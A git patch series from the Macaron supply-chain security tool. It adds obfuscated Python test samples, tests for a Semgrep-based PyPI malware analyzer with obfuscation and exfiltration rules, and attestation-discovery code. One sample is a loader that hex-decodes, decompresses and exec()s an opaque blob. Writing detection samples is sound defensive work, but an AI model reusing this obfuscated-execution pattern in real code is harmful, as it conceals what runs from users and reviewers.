cannot accidentally be used +__all__ = [] +sys.exit() + +def test_function(): + """ + All code to be tested will be defined inside this function, so it is all local to it. 
This is + to isolate the code to be tested, as it exists to replicate the patterns present in malware + samples. + """ + sys.exit() + # using pyobfuscate.com/rename-obf to rename items, code is a class that has one method that prints Hello world! + lllllllllllllll, llllllllllllllI = __name__, print + + class lIIlIIIIIIIlIlllIl: + IIlIllIIlllIlIlIll = 'Hello' + IlIIlIIIlIllIIlIIl = 'world' + IIlIlIlIIIIlIIlIlI = '!' + + def IIlIlIIIIlIlIlIIll(IIIlIlIIllllIlIlll): + llllllllllllllI(f'{IIIlIlIIllllIlIlll.IIlIllIIlllIlIlIll} {IIIlIlIIllllIlIlll.IlIIlIIIlIllIIlIIl}{IIIlIlIIllllIlIlll.IIlIlIlIIIIlIIlIlI}') + if lllllllllllllll == '__main__': + llIlIIIllIIIIlIlll = lIIlIIIIIIIlIlllIl() + llIlIIIllIIIIlIlll.IIlIlIIIIlIlIlIIll() + + # using using pyob.oxyry.com's naming convention + __O0O00O00O0OOOOO0O, __OO00000OOOO000OO0 = __name__, print + + class OO0OO0OOO0OOOO000: + OO000OOOOO00O0OOO = 'Hello' + OOO0O00O00000O0O0 = 'world' + OOOOO0O000O0O000O = '!' + + def OOOOOO000OOO0O0O0(O00O00O0O00O000O0): + __OO00000OOOO000OO0(f'{O00O00O0O00O000O0.OO000OOOOO00O0OOO} {O00O00O0O00O000O0.OOO0O00O00000O0O0}{O00O00O0O00O000O0.OOOOO0O000O0O000O}') + if __O0O00O00O0OOOOO0O == '__main__': + __OO00000O00OOOO0OO = OO0OO0OOO0OOOO000() + __OO00000O00OOOO0OO.OOOOOO000OOO0O0O0() + + # using pyarmor's RTF mode naming convention + pyarmor__12, pyarmor__14 = __name__, print + + class pyarmor__16: + pyarmor__18 = 'Hello' + pyarmor__0 = 'world' + pyarmor__8 = '!' 
+ + def pyarmor__24(pyarmor__60): + pyarmor__14(f'{pyarmor__60.pyarmor__18} {pyarmor__60.pyarmor__0}{pyarmor__60.pyarmor__8}') + if pyarmor__12 == '__main__': + pyarmor__2 = pyarmor__16() + pyarmor__2.pyarmor__24() + + # inline pyarmor marker + # pyarmor: print('this script is obfuscated') + + # obfuscated using pyobfuscate.com/pyd's AES 256-bit encryption + pyobfuscate=(lambda getattr:[((lambda IIlII,IlIIl:setattr(__builtins__,IIlII,IlIIl))(IIlII,IlIIl)) for IIlII,IlIIl in getattr.items()]);Il=chr(114)+chr(101);lI=r'[^a-zA-Z0-9]';lIl=chr(115)+chr(117)+chr(98);lllllllllllllll, llllllllllllllI, lllllllllllllIl,lllllllllIIllIIlI = __import__, getattr, bytes,exec + __import__("sys").setrecursionlimit(100000000);lllllllllIIllIIlI(llllllllllllllI(lllllllllllllll(lllllllllllllIl.fromhex('7a6c6962').decode()), lllllllllllllIl.fromhex('6465636f6d7072657373').decode())(lllllllllllllIl.fromhex('789ced1ded6edb38f2557cbf22b559c1f737455e615f20300437717b069cb8485cec2e0ef7ee2759964491f3c90f597224140b9543cef70c6748b95b96f5f378d8be7e7fd9aeca87d33fbf76d99732ff56aecbc78fd3fbb7f2f23cbeec9f4fd5683775fd50ae8bb27c3ebeeccab2783e96dbf79fcfc7df6fa7f392c73f8f6fbbea6dfd58ae1b1c8f0d9eeca9c29ce5f7d59f167556c1d65983f7a15a5243fa918a52f5f79ada79c500500fe69b8ad9f2f169736195a2033fa648e7a7306617c822674276561db928cbeba752efba67ca62c2e400a67759e960e86d58affeb9eb665a04feb3fbfb1e18ae6c7d6f68a25179cf8b561bcc70d928e3a9056ebe7ae2ef703d652dfccb97f6ed6bb7240f2090197caa191d7006b15671e6ab5b9bb50e79ee25ec10599e354ee07a6af300feaa8e1867fec0271eda974eae40233276c89b5411413015d9388ec9a2e9c32383228566323767d253c1e8cbfd3c522fe5a89660fc772ccb926c991c6db0582eeddde36dfbdaef1f6d40fc381cb72710433be3e7e1f87d7bf870e7b413f6a7dd3bca439c6dd8021ad2fb99231c438b854d3fc364dbeaec690369ccdea9d78f55ddb38675db627a3ebefe3af4bbffd0e4cf87edc7c7d9e67d02fcb13f746ed08efef77ff736de5fc7bfee873c3dfcdc9db6a7d33b659baccab74f04bc99044ec80671e66d9750349874839853236dcbbcd8bc4517364c4c185df20cdd533bd3eb6a8ca924ff44ae5de510a7921bc6ffcbfeddee18cc59565fd2
da6988b39d7b7c7fb9a71004158a4d13756efabc115ac054dd43a4d225298f00aff556a443953d6d545e9b653e55a4b85cedc73c0acfe00ddf4010905ece1a0d4c87bdc3085eaea0a98858b498e279a0bc89d23be320aed2679036a7b6676818a58caedbcc53b7c218cd2e141261778be27eceb241c4de20ec72823fbf6cb08c76fa103d18977c776bf94e7166e6229abb6e3a708a236d1feee225c31ad31f1d78035c7798874c59776e32c9d41b642b1c57b08dae6d645141c3edfbf076e40ea5e93de43919cc210af472e1f4fb2b91dfa0dd0fe0ba2ade18b2c16503c12c5660286f37e4b21a2b914b5c23374108dcf2d7a6dcc910a837777158dd14eb56246ceb362b1c7d5994e7c0317dbda1640643598e74d836c717dfb79224e638eb0e47a58cfd0f22bd3199af6eb2d61bc291ea63b6dde163677077666b9d886c470f02d5c01fc7f7b302f66f75f3919b370e5cd3c1160b0f46b510ff50c5f00977b139c3f856a5bffe299b3c70ae51065aa995d168a5b9a8af15d3b17ef6963cdf40df74148d104543d272caccf0315349608aab8611a7a7531f84ed2c7cd7554eae9dece619e12f6612e0b1c7276d2e908dd6b98ee3b8e968d0740d813d3e56b248b92fcc8e0cdf55f8b943fba22808e07b0d963a8094f345bd079a7b31f2c10acd1d5662912a91577ec3fb628eab0e5782161bff1081e38ad395108c38577d0c9aec1034ddf9eae3652caf37f084fcdb4f5a79c86c12ebb4519979049c091923f3879d490484bba521d9449d88635a0a103e4641e0a1b9880d89f169d7f5124bd8698a3eb12b542ededb0066f9649762bf10947d91e48f9f9c1869838c91bb5f31a6bb4fe424ed188c5d3c71843df21dad58a7a8948b0e08c416bdfa3531a350dc86c99aafa4bbf5c5e327e0e3ce8b321b246d8a74fe116fe7153a008d589c30f515c1d56ae7160cb5fec12d6fc43a35042cda84476ebbc58a715fc2ba5acf5d83c87983275d599b62b3c53a8564dd8cead39708a9d20547a8e9e36da481d93376334c6aab5bdbbafd355d9de4cfa78232a40bed92c33dcc233b46389c8f2e7460ef40a25166e694c78063ec65fefb7a4f2aec0aca5dece9a9aeec4adff1898ea8d54bac33b4de49af7a18d6c1639d09191286e5b274d5accb3551080579b9e025fd711576206c97af57dcd23bee8917d63126d7e13a1de10855751093ba3dc57d11745f89cbbba1575ff152ae9b203e4c135e4b8ce74a148fe4a5479ae336774d408f1fa7750cb8f6080c54f89f4998d0415ae86d162fcdf0f7bdd1bba69e57a53dbd0aec906fbcd2b520ad9fcda142f5edf6253c744812ddce881928553575ea8226ecaa5d73a5dbe7bb6bba62c7a4e645549886e849b427a708338f1d3bced6a966355483e0763b
c5db4e9fb649204bacab2aed098a4b3566de1dedf4cc7f73d7ab0af4d5ebb96afab396511d324eea897cbc19a28098a72a486c26687426518f462d0113da3d6e4e0c3d115688ea187fb2f7386a170fb6b977b773c5eec1f74220fcdc3530a84d47bcfe114bb22633c6cdcb68ff6496f6a346da4d94aa8cd9faf67ab0f2dde4be919717bceee2d0ebe20e4fd4afeac38af44437d2f8575971afd1340df0668493c0321dfa712e85da9fed151740f3dfafdddfcda74021672001c2715ea0b70074408cbe4020ae460782a337392194afa0c54150b5c0f361d695540124d61033a3b0a0f6df07b3796a281663ba0b221d4aeb3d2acd721251e62078ee40851b0dc600171c61b1414ac9d181514ecdb7009935c9a9a4b332cc00c2a8d0818924818f1b1a45782d7a8773c881fe86e862305799300937c391396cd0080b4b1a96c72105c239006a85b354ca2a91e630230bb91aaa9f94873437c60b665e3a91810b7bf258ead56c8ba486344e8213004d66a37627b94b6da2b83b78953300c8e552538ab48b2016c9fc2ee1159509cf78ea3d51babd312a77025e610b63d0cda45205b8590411570b506a8ddcf8a9bc8b8258a589799339ea27f03ab555b59afbb47e0c5b5cd3c675624853b6af401c046242ca326137dec524ce230e2c5554201cd8eb901211a218da0542a0ae301304180a7415684de3538f5d1be1b3157641b55798a491ac07d45ceaadc72e93f5540dcc1c75649ccd17d59ff4dfc7253fdd64c2ec4680449e411049f72f18a2c878f82252589c840630857ce362e1e5472d042f91548710b5a1f023d509ca3cc5381f69239cb2b30ccd3bb8290004c272545e6b24109d630ede16780713217297f031e9d57e58831aebb876651792de73b56681095d4a5f62b640fb83c171e30eb7f4bbacc45efd2e44455cbbceb56ca5d04daef8bcb5b29550fe721f3f84ba296c18843203c019bdf4dad6fcea51a16659ed68c4a0b9e280d73f6a83add64fb5087ae150734a7160af1b8847535c8ed84a4d40077a168d786e85a13528090b1850481682becc00d29771da28c1e6cb8d898d7d02875b3a1156629f4e04a3ae3b48ef9e59b52644fcde101088a409b42376e4f99454444de8557ff1992b415501a7db525a6811e37245d2a27060dfaf1387bc8afd0b654864735c75586af6def5681cd24053188291c672cff4bfd31be5275ae3fdc3d2cbad6e14e054f723922c9b0974e53704b8b1cd080b8ee55657eb9bce3234efe0a6001078ef5db0932cb7ba43c6956967686fb175a8e24619981440a9b5e553668ee004bc6e39506125f6f3e3a0bbdd1997af1dcee9d49a4b093be471296135de8e05c852c2e2e0b0682a4897e5141016648848323a30ca19c60369a758d9c3f3330e944d6c
5eb4b46cc700a8b814499bdaa597df95a6288bad41690a820d37cb2256b53561beaccea1ced827f0b5a5056325f6fd35a9b67ae3b4aeae5d18edc0c30002a1f524f9be194d51de79fdd88ffb91df7014bf33f1206d52e0bc091d66dca8703f9018ed0a6c6c62e3d01a557db33e87f1eac3e60574403e197c39839942cf49c98805c77206a3148a64de60c4c18ea627dc62132f6308aaea109c5fd3610d6aac73332d0213e194bec46c81f60783e3c61d6ee9725989f52e0cdadaf3a3edf333bf729708e21b0202e134ed3a57518088139635c427aa8914b5a8360125915cca4912496c50e530b3200aaa9c4f2132d6d13c595cc7081f10f9f273c51baf41ac410bae5040215948c6d7d58a5e93073fb589b903ddc019fb047eb7d4beacc4be9e0ce3d494c0a9cf93675452d306ba1120109d4b294dcfb0d1ba6486a1255301cc6c495b56b129905c4a4802835c02c518027911266cb1ab899853e8a09f2a65034c41038a4bf9ae8a11b9bd4817ba8d32ca1ab4e00a05149285a02f3380f4458f364ab0f9726362639fc0e196ba9d95d8bb030dfb7dcc8c8a6a1584c03827201049d3aeb199a914090dc01ae2d356829202ceb5b4fccafcb27c96a1148a64de6004dc4a347b278c40b80309b6b6cba8bf8628aaea109c5fc5610d6aac7363f50105e4d426e60e740330466edcef964a979538c493434a5de39955d50b7b7a8ffe1680401c4dbece35ed02da19331c44c2c53df98296d4945ff9280c6f563b4b11040d5a7085020ac94234d71180a508e251cfcfef962288957802455039b33ac85934a1fae55395458431fd0e6bc55512311f665d4995c987fc0c3b67b9796d18944b61c632ac77789c3f0a0231111a0fd07a30e804bb9f85d05a0572cae150ca497360afeb20a07a0614976f195a3712da456a2f654ccfb1d6b406256101030ac94234d40940faca501b25d87cb931b1b14fe0704b73c34a1cf02d030813b637c9bf142eddc68667d3e6550240357e4f7120303f1a53f7946c986788afa79befc329dd610c77e4318705c7d37edbd23c293f774fdd975fd65776697da55e5034aff70eb05ebc19edff0cd1139aa01aa0516615bc081c554ddda4fd178eaff5cbe63846011d763eec47f4a9012a582957d589cbd20c4d04e9758662a4c95ea0d325d70e12ffa9d3e5a7b33a8fcab2c448fbd56d1b62a8d311549a94c46ddb8a098a5b11de4eb8e93ca6f9f3ad22f194d5c0a29dd6b2d80b5a61e966d870688ef10ca7131311d4007e741a8e9f5802ad32a7a32c3b3869e1382686cb077349c418566a11cec979d5e65b76f1fa5576795b3d1f5f760fabdddffb5356bfe679f6ef7cb5ffb17a3b9e56cfdbc361fbfdb0cb7eee4edbd3e9bd6aeebfffde1f4efbb78fcabb5777cfc7d7
5ffbc3eeee7ef5e7f1ad5aba3abeafa0a9c56562b5a42c5f8f2fbf0fbbb2ac56dddde5ab7f3daeeeda997722046fdbd7e1f2968dd5eef0b1bbb092d50130088d6fad22eabf19efe0434ea834f994b5f02f5fdab7afdd927cf3d58b408db81df644919c4780d74d6ece0cd7ed43c777fb12c0abc9a7164b5695c9feab5d3e1883346aecb33a90e16393fc647e9aff1f99b5fed2'.replace("\n" , ""))).decode()) diff --git a/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py new file mode 100644 index 000000000..15394e232 --- /dev/null +++ b/tests/malware_analyzer/pypi/test_pypi_sourcecode_analyzer.py @@ -0,0 +1,290 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Tests detecting malicious patterns in PyPI package sourcecode.""" +import json +import os +from unittest.mock import MagicMock, patch + +import pytest +import yaml + +from macaron import MACARON_PATH +from macaron.errors import ConfigurationError, HeuristicAnalyzerValueError +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult +from macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer import PyPISourcecodeAnalyzer + +RESOURCES_PATH = os.path.join(MACARON_PATH, "resources") + + +def get_rule_ids_list(path: str) -> set[str]: + """ + Extract a set of Semgrep rule IDs from a .yaml file. + + Parameters + ---------- + path: str + the path to the .yaml file to read. 
+ """ + with open(path, encoding="utf8") as semgrep_yaml: + ruleset: dict[str, list] = yaml.safe_load(semgrep_yaml.read()) + return {rule["id"] for rule in ruleset["rules"]} + + +def test_no_resources() -> None: + """Test for when the semgrep rules can't be found, so error.""" + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path="") + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_defaults_section(mock_defaults: MagicMock) -> None: + """Test for when the heuristics.pypi in defaults isn't defined at all, so error.""" + mock_defaults.has_section.side_effect = lambda _: False + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +def test_no_sourcecode(pypi_package_json: MagicMock) -> None: + """Test for when there is no source code available, so error.""" + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = "" + + with pytest.raises(HeuristicAnalyzerValueError): + analyzer.analyze(pypi_package_json) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_no_custom_path(mock_defaults: MagicMock) -> None: + """Test for when a default path isn't provided, so the custom rule path should be None.""" + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: None) if section == "heuristic.pypi" else None + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + # Make sure the empty string is not considered as a path + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: "") if section == "heuristic.pypi" else None + ) + 
analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + assert analyzer.custom_rule_path is None + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_nonexistent_rule_path(mock_defaults: MagicMock) -> None: + """Test for when the custom path provided does not exist, so error.""" + defaults = { + "custom_semgrep_rules_path": "some_random_path", + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_invalid_custom_rules(mock_defaults: MagicMock) -> None: + """Test for when the provided file is not a valid semgrep rule, so error,""" + # use this file as an invalid semgrep rule as it is most definitely not a semgrep rule, and does exist + defaults = { + "custom_semgrep_rules_path": os.path.abspath(__file__), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("sourcecode_sample_dir", "rule_file"), + [ + pytest.param("obfuscation", "obfuscation.yaml", id="obfuscation"), + pytest.param("exfiltration", 
"exfiltration.yaml", id="exfiltration"), + ], +) +def test_rules( + mock_defaults: MagicMock, pypi_package_json: MagicMock, sourcecode_sample_dir: str, rule_file: str +) -> None: + """Test the default Semgrep rulesets on code samples.""" + sample_path = os.path.join( + os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples", sourcecode_sample_dir + ) + + with open(os.path.join(sample_path, "expected_results.json"), encoding="utf-8") as file: + expected_results = json.loads(file.read()) + + # Test with none of the defaults.ini settings used, to ensure this ruleset is run + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: ( + MagicMock(get=lambda _: None) if section == "heuristic.pypi" else None + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + pypi_package_json.package_sourcecode_path = sample_path + analyzer.default_rule_path = os.path.join(analyzer.default_rule_path, rule_file) + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + assert expected_results == analysis + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_custom_rules(mock_defaults: MagicMock, pypi_package_json: MagicMock) -> None: + """Test that custom rulesets are properly run and appear in output detections""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + custom_rule_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml") + expected_ids = get_rule_ids_list(custom_rule_path) + + defaults = { + "custom_semgrep_rules_path": custom_rule_path, + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda 
section: sub_section if section == "heuristic.pypi" else None + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["enabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["enabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["enabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +@pytest.mark.parametrize( + # the sourcecode sample directory under resources/sourcecode_samples and the semgrep rule under resources/pypi_malware_rules + ("defaults", "list_keys", "rulefile_path"), + [ + pytest.param( + {"disabled_default_rulesets": "obfuscation"}, + {"disabled_default_rulesets"}, + os.path.join(RESOURCES_PATH, "pypi_malware_rules", "obfuscation.yaml"), + id="test_disable_default_ruleset", + ), + pytest.param( + { + "disabled_custom_rulesets": "custom_sample", + "custom_semgrep_rules_path": os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources"), + }, + {"disabled_custom_rulesets"}, + os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml"), + id="test_disable_custom_ruleset", + ), + ], +) +def test_disabling_rulesets( + mock_defaults: MagicMock, + pypi_package_json: MagicMock, + defaults: dict[str, str], + list_keys: set[str], + rulefile_path: str, +) -> None: + """Test that rulesets can be disabled""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + + expected_ids = get_rule_ids_list(rulefile_path) + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda 
section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + [x.strip() for x in defaults[option].split("\n") if x.strip()] + if section == "heuristic.pypi" and option in list_keys + else None + ) + + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["disabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["disabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["disabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() + + +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_unknown_ruleset_exclusions(mock_defaults: MagicMock) -> None: + """Test when there are ruleset names supplied to be disabled that don't exist""" + defaults = { + "disabled_custom_rulesets": "custom_sample\ndoes_not_exist", + "custom_semgrep_rules_path": os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources"), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + [x.strip() for x in defaults[option].split("\n") if x.strip()] + if section == "heuristic.pypi" and option == "disabled_custom_rulesets" + else None + ) + + with pytest.raises(ConfigurationError): + _ = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + + 
+@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.defaults") +def test_disabling_rules(mock_defaults: MagicMock, pypi_package_json: MagicMock) -> None: + """Test individual rules can be disabled""" + sample_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "sourcecode_samples") + custom_rule_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "resources", "custom_sample.yaml") + expected_ids = {"custom_sample_1", "exfiltration_remote-exfiltration"} + + defaults: dict[str, str] = { + "custom_semgrep_rules_path": custom_rule_path, + "disabled_rules": "\n".join(expected_ids), + } + sub_section = MagicMock() + sub_section.get.side_effect = defaults.get + + mock_defaults.has_section.side_effect = lambda section: section == "heuristic.pypi" + mock_defaults.__getitem__.side_effect = lambda section: sub_section if section == "heuristic.pypi" else None + mock_defaults.get_list.side_effect = lambda section, option: ( + list(expected_ids) if section == "heuristic.pypi" and option == "disabled_rules" else None + ) + analyzer = PyPISourcecodeAnalyzer(resources_path=RESOURCES_PATH) + pypi_package_json.package_sourcecode_path = sample_path + + result, analysis = analyzer.analyze(pypi_package_json) + + assert result == HeuristicResult.FAIL + + # ensure the type is correct + assert isinstance(analysis["disabled_sourcecode_rule_findings"], dict) + assert all(isinstance(k, str) for k in analysis["disabled_sourcecode_rule_findings"]) + + actual_ids = {rule_id.split(".")[-1] for rule_id in analysis["disabled_sourcecode_rule_findings"]} + assert expected_ids - actual_ids == set() diff --git a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py index 15caf3249..fe7c2f701 100644 --- a/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py +++ b/tests/slsa_analyzer/checks/test_detect_malicious_metadata_check.py @@ -7,10 
+7,12 @@ import os import urllib.parse from pathlib import Path +from unittest.mock import MagicMock, patch import pytest from pytest_httpserver import HTTPServer +from macaron import MACARON_PATH from macaron.config.defaults import load_defaults from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics from macaron.slsa_analyzer.checks.check_result import CheckResultType @@ -22,20 +24,32 @@ RESOURCE_PATH = Path(__file__).parent.joinpath("resources") +@patch("macaron.malware_analyzer.pypi_heuristics.sourcecode.pypi_sourcecode_analyzer.global_config") @pytest.mark.parametrize( - ("purl", "expected"), + ("purl", "expected", "sourcecode_analysis"), [ # TODO: This check is expected to FAIL for pkg:pypi/zlibxjson. However, after introducing the wheel presence # heuristic, a false negative has been introduced. Note that if the unit test were allowed to access the OSV # knowledge base, it would report the package as malware. However, we intentionally block unit tests # from reaching the network. - ("pkg:pypi/zlibxjson", CheckResultType.PASSED), - ("pkg:pypi/test", CheckResultType.UNKNOWN), - ("pkg:maven:test/test", CheckResultType.UNKNOWN), + pytest.param("pkg:pypi/zlibxjson", CheckResultType.PASSED, False, id="test_malicious_pypi_package"), + pytest.param("pkg:pypi/test", CheckResultType.UNKNOWN, False, id="test_unknown_pypi_package"), + pytest.param("pkg:maven:test/test", CheckResultType.UNKNOWN, False, id="test_non_pypi_package"), + # TODO: including source code analysis that detects flow from a remote point to a file write may assist in resolving + # the issue of this false negative. 
+ pytest.param( + "pkg:pypi/zlibxjson", CheckResultType.PASSED, True, id="test_sourcecode_analysis_malicious_pypi_package" + ), ], ) def test_detect_malicious_metadata( - httpserver: HTTPServer, tmp_path: Path, macaron_path: Path, purl: str, expected: str + mock_global_config: MagicMock, + httpserver: HTTPServer, + tmp_path: Path, + macaron_path: Path, + purl: str, + expected: str, + sourcecode_analysis: bool, ) -> None: """Test that the check handles repositories correctly.""" check = DetectMaliciousMetadataCheck() @@ -44,6 +58,10 @@ def test_detect_malicious_metadata( ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir="", purl=purl) pypi_registry = PyPIRegistry() ctx.dynamic_data["package_registries"] = [PackageRegistryInfo("pip", "pypi", pypi_registry)] + if sourcecode_analysis: + ctx.dynamic_data["analyze_source"] = True + + mock_global_config.resources_path = os.path.join(MACARON_PATH, "resources") # Set up responses of PyPI endpoints using the httpserver plugin. with open(os.path.join(RESOURCE_PATH, "pypi_files", "zlibxjson.html"), encoding="utf8") as page: @@ -129,5 +147,5 @@ def test_evaluations(combination: dict[Heuristics, HeuristicResult]) -> None: confidence, triggered_rules = check.evaluate_heuristic_results(combination) assert confidence == 0 - # Expecting this to be a dictionary, so we can ignore the type problems + # Expecting this to be a dictionary, so we can ignore the type problems. assert len(dict(triggered_rules)) == 0 # type: ignore[arg-type] From d6134add6883d37ed8e3202c9085072767d6f1e7 Mon Sep 17 00:00:00 2001 From: Ben Selwyn-Smith Date: Wed, 4 Jun 2025 16:26:13 +1000 Subject: [PATCH 06/14] feat: add GitHub attestation discovery (#1020) This PR allows Macaron to discover GitHub attestation. To retrieve these attestations, the SHA256 hash of the related artefact is required. Hashes are computed from local artefact files if available, or from downloaded ones otherwise. 
Signed-off-by: Ben Selwyn-Smith --- src/macaron/artifact/local_artifact.py | 60 +++++- src/macaron/artifact/maven.py | 21 +- .../sourcecode/suspicious_setup.py | 2 +- src/macaron/repo_finder/repo_finder.py | 7 +- src/macaron/repo_finder/repo_finder_pypi.py | 39 ++-- src/macaron/slsa_analyzer/analyzer.py | 188 ++++++++++++++++-- .../checks/build_script_check.py | 4 - .../checks/detect_malicious_metadata_check.py | 33 ++- .../checks/provenance_commit_check.py | 4 - .../checks/provenance_repo_check.py | 4 + .../slsa_analyzer/git_service/api_client.py | 21 +- .../maven_central_registry.py | 83 +++++++- .../package_registry/package_registry.py | 4 +- .../package_registry/pypi_registry.py | 115 ++++++++++- .../slsa_analyzer/provenance/loader.py | 26 ++- tests/artifact/test_local_artifact.py | 20 ++ tests/artifact/test_maven.py | 15 +- .../cases/github_maven_attestation/policy.dl | 10 + .../cases/github_maven_attestation/test.yaml | 22 ++ .../github_maven_attestation_local/policy.dl | 10 + .../github_maven_attestation_local/test.yaml | 30 +++ .../cases/github_pypi_attestation/policy.dl | 10 + .../cases/github_pypi_attestation/test.yaml | 20 ++ .../test_maven_central_registry.py | 113 +++++++---- 24 files changed, 742 insertions(+), 119 deletions(-) create mode 100644 tests/integration/cases/github_maven_attestation/policy.dl create mode 100644 tests/integration/cases/github_maven_attestation/test.yaml create mode 100644 tests/integration/cases/github_maven_attestation_local/policy.dl create mode 100644 tests/integration/cases/github_maven_attestation_local/test.yaml create mode 100644 tests/integration/cases/github_pypi_attestation/policy.dl create mode 100644 tests/integration/cases/github_pypi_attestation/test.yaml diff --git a/src/macaron/artifact/local_artifact.py b/src/macaron/artifact/local_artifact.py index ed37c335a..0df7e6248 100644 --- a/src/macaron/artifact/local_artifact.py +++ b/src/macaron/artifact/local_artifact.py @@ -1,17 +1,21 @@ -# Copyright (c) 2024 - 
2024, Oracle and/or its affiliates. All rights reserved. +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. """This module declares types and utilities for handling local artifacts.""" import fnmatch import glob +import hashlib +import logging import os from packageurl import PackageURL -from macaron.artifact.maven import construct_maven_repository_path +from macaron.artifact.maven import construct_maven_repository_path, construct_primary_jar_file_name from macaron.errors import LocalArtifactFinderError +logger: logging.Logger = logging.getLogger(__name__) + def construct_local_artifact_dirs_glob_pattern_maven_purl(maven_purl: PackageURL) -> list[str] | None: """Return a list of glob pattern(s) representing the directory that contains the local maven artifacts for ``maven_purl``. @@ -247,3 +251,55 @@ def get_local_artifact_dirs( ) raise LocalArtifactFinderError(f"Unsupported PURL type {purl_type}") + 